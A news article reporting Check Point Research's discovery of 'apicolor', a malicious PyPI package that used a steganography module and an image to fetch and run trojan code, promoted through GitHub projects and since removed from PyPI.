This random image is spreading a malicious PyPl package using GitHub

A stylized depiction of a padlocked WiFi symbol sitting in the centre of an interlocking vault.
(Image credit: Shutterstock / jijomathaidesigners)

Cybersecurity researchers from Check Point Research (CPR) have discovered a new malicious package on PyPI, the code repository for the Python programming language which uses an image to deliver a Trojan malware, largely using GitHub.

The threat actors behind this new campaign hope that while searching the web for legitimate projects, Python developers will, sooner or later, come across ‘apicolor’. 

The seemingly benign in-development package on PyPI, once installed, first manually installs extra requirements, and then downloads a picture from the web. The extra requirements process the picture, and trigger the processing generated output using the exec command. 

Steganography attack

One of those two requirements is the judyb code, that’s in fact a steganography module, capable of revealing hidden messages within pictures. That led the researchers back to the picture which, as it turns out, downloads malicious packages from the web to the victim's endpoint.

Malicious image

(Image credit: Check Point Research)

“The immediate place to investigate such packages is GitHub,” the researchers explain. “Researchers searched for code projects using these packages, enabling the team to further understand their infection techniques (if anyone mistakenly installed them and if they did, how it happened). Using this search, it became apparent that apicolor and judib are quite niche, having low usage on GitHub projects.“ 

As soon as CPR notified PyPI of its findings, the latter removed the malicious package from its platform.

While the researchers did not find out who the threat actor behind this campaign was, it did say that the whole ordeal was “carefully planned and thought”, further stating that the obfuscation techniques on PyPI have evolved. 

“We constantly scan PyPI for malicious packages and responsibly report them to PyPI. This one is unique and distinct from almost all the malicious packages we have encountered before,” commented Quote: Ori Abramovsky, Head of Data Science, SpectralOps, a Check Point company. 

“This package differs in the way it camouflages its intent, and the way in which it targets PyPI users to infect them with malicious imports on GitHub. Our findings indicate that PyPI malicious packages and their obfuscation techniques are fast-evolving. The package we have shared here reflects careful and meticulous work. It is not the regular copy and past that we commonly see, but what seems like a real campaign. The creation of the GitHub projects, then smartly hiding the code and downplaying the packages on PyPI, are all sophisticated work.”

Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.